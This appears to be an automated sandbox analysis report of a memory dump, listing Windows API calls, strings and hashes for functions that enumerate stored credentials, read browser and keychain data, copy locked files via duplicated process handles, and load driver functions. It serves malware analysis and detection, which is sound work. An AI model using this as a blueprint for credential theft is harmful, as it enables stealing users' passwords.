37756->37755 37758 41ee41 37757->37758 37759 41ee32 37757->37759 37768 41edad 37758->37768 37771 4446ce 11 API calls 37759->37771 37762 41ee3c 37762->37744 37765 41ee58 37765->37762 37773 41ee6b 37765->37773 37767->37748 37777 41be52 37768->37777 37771->37762 37772 41eb85 11 API calls 37772->37765 37774 41ee70 37773->37774 37775 41ee78 37773->37775 37833 41bf99 86 API calls 37774->37833 37775->37762 37778 41be6f 37777->37778 37779 41be5f 37777->37779 37785 41be8c 37778->37785 37798 418c63 37778->37798 37812 4446ce 11 API calls 37779->37812 37782 41be69 37782->37762 37782->37772 37783 41bee7 37783->37782 37816 41a453 86 API calls 37783->37816 37785->37782 37785->37783 37786 41bf3a 37785->37786 37789 41bed1 37785->37789 37815 4446ce 11 API calls 37786->37815 37788 41bef0 37788->37783 37791 41bf01 37788->37791 37789->37788 37792 
41bee2 37789->37792 37790 41bf24 memset 37790->37782 37791->37790 37793 41bf14 37791->37793 37813 418a6d memset memcpy memset 37791->37813 37802 41ac13 37792->37802 37814 41a223 memset memcpy memset 37793->37814 37797 41bf20 37797->37790 37801 418c72 37798->37801 37799 418c94 37799->37785 37800 418d51 memset memset 37800->37799 37801->37799 37801->37800 37803 41ac52 37802->37803 37804 41ac3f memset 37802->37804 37807 41ac6a 37803->37807 37817 41dc14 19 API calls 37803->37817 37805 41acd9 37804->37805 37805->37783 37809 41aca1 37807->37809 37818 41519d 37807->37818 37809->37805 37810 41acc0 memset 37809->37810 37811 41accd memcpy 37809->37811 37810->37805 37811->37805 37812->37782 37813->37793 37814->37797 37815->37783 37817->37807 37821 4175ed 37818->37821 37829 417570 SetFilePointer 37821->37829 37824 41760a ReadFile 37825 417637 37824->37825 37826 417627 GetLastError 37824->37826 37827 4151b3 37825->37827 37828 41763e memset 37825->37828 37826->37827 37827->37809 37828->37827 37830 4175b2 37829->37830 37831 41759c GetLastError 37829->37831 37830->37824 37830->37827 37831->37830 37832 4175a8 GetLastError 37831->37832 37832->37830 37833->37775 37834 417bc5 37835 417c61 37834->37835 37840 417bda 37834->37840 37836 417bf6 UnmapViewOfFile CloseHandle 37836->37836 37836->37840 37838 417c2c 37838->37840 37846 41851e 20 API calls 37838->37846 37840->37835 37840->37836 37840->37838 37841 4175b7 37840->37841 37842 4175d6 FindCloseChangeNotification 37841->37842 37843 4175c8 37842->37843 37844 4175df 37842->37844 37843->37844 37845 4175ce Sleep 37843->37845 37844->37840 37845->37842 37846->37838 39880 4147f3 39883 414561 39880->39883 39882 414813 39884 41456d 39883->39884 39885 41457f GetPrivateProfileIntW 39883->39885 39888 4143f1 memset _itow WritePrivateProfileStringW 39884->39888 39885->39882 39887 41457a 39887->39882 39888->39887

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040DDAD
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                    • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                    • _wcsicmp.MSVCRT ref: 0040DEB2
                    • _wcsicmp.MSVCRT ref: 0040DEC5
                    • _wcsicmp.MSVCRT ref: 0040DED8
                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                    • memset.MSVCRT ref: 0040DF5F
                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                    • _wcsicmp.MSVCRT ref: 0040DFB2
                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                    • API String ID: 594330280-3398334509
                    • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                    • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                    • memset.MSVCRT ref: 00413D7F
                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                    • memset.MSVCRT ref: 00413E07
                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                    • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                    • API String ID: 912665193-1740548384
                    • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                    • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                    • memcpy.MSVCRT ref: 0040B60D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                    • String ID: BIN
                    • API String ID: 1668488027-1015027815
                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                    APIs
                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                      • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                    • String ID:
                    • API String ID: 2947809556-0
                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                    APIs
                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileFind$FirstNext
                    • String ID:
                    • API String ID: 1690352074-0
                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                    APIs
                    • memset.MSVCRT ref: 0041898C
                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: InfoSystemmemset
                    • String ID:
                    • API String ID: 3558857096-0
                    • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                    • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 004455C2
                    • wcsrchr.MSVCRT ref: 004455DA
                    • memset.MSVCRT ref: 0044570D
                    • memset.MSVCRT ref: 00445725
                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                      • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                      • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                    • memset.MSVCRT ref: 0044573D
                    • memset.MSVCRT ref: 00445755
                    • memset.MSVCRT ref: 004458CB
                    • memset.MSVCRT ref: 004458E3
                    • memset.MSVCRT ref: 0044596E
                    • memset.MSVCRT ref: 00445A10
                    • memset.MSVCRT ref: 00445A28
                    • memset.MSVCRT ref: 00445AC6
                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                    • memset.MSVCRT ref: 00445B52
                    • memset.MSVCRT ref: 00445B6A
                    • memset.MSVCRT ref: 00445C9B
                    • memset.MSVCRT ref: 00445CB3
                    • _wcsicmp.MSVCRT ref: 00445D56
                    • memset.MSVCRT ref: 00445B82
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                    • memset.MSVCRT ref: 00445986
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                    • API String ID: 2745753283-3798722523
                    • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                    • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                    • String ID: $/deleteregkey$/savelangfile
                    • API String ID: 2744995895-28296030
                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040B71C
                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                    • wcsrchr.MSVCRT ref: 0040B738
                    • memset.MSVCRT ref: 0040B756
                    • memset.MSVCRT ref: 0040B7F5
                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                    • memset.MSVCRT ref: 0040B851
                    • memset.MSVCRT ref: 0040B8CA
                    • memcmp.MSVCRT ref: 0040B9BF
                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                    • memset.MSVCRT ref: 0040BB53
                    • memcpy.MSVCRT ref: 0040BB66
                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                    • String ID: chp$v10
                    • API String ID: 170802307-2783969131
                    • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                    • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                    • memset.MSVCRT ref: 0040E380
                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                    • wcschr.MSVCRT ref: 0040E3B8
                    • memcpy.MSVCRT ref: 0040E3EC
                    • memcpy.MSVCRT ref: 0040E407
                    • memcpy.MSVCRT ref: 0040E422
                    • memcpy.MSVCRT ref: 0040E43D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                    • API String ID: 3073804840-2252543386
                    • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                    • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                    • String ID:
                    • API String ID: 3715365532-3916222277
                    • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                    • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                      • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                    • CloseHandle.KERNEL32(?), ref: 0040E148
                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                    • String ID: bhv
                    • API String ID: 327780389-2689659898
                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                    • API String ID: 2941347001-70141382
                    • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                    • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                    Control-flow Graph (rendered graph not reproduced)
                    • Blocks 4466f4-4468dd, CRT start-up: call 446904, GetModuleHandleA -> __set_app_type, __p__fmode, __p__commode, call 4153f2 -> __setusermatherr (conditional) -> call 4468f0, _initterm, __wgetmainargs, _initterm -> GetStartupInfoW at 446853 -> GetModuleHandleA, call 41276d at 44687c -> exit at 446896 or straight to _cexit at 44689d -> call 44693d at 4468d8.
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                    • String ID:
                    • API String ID: 2827331108-0
                    • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
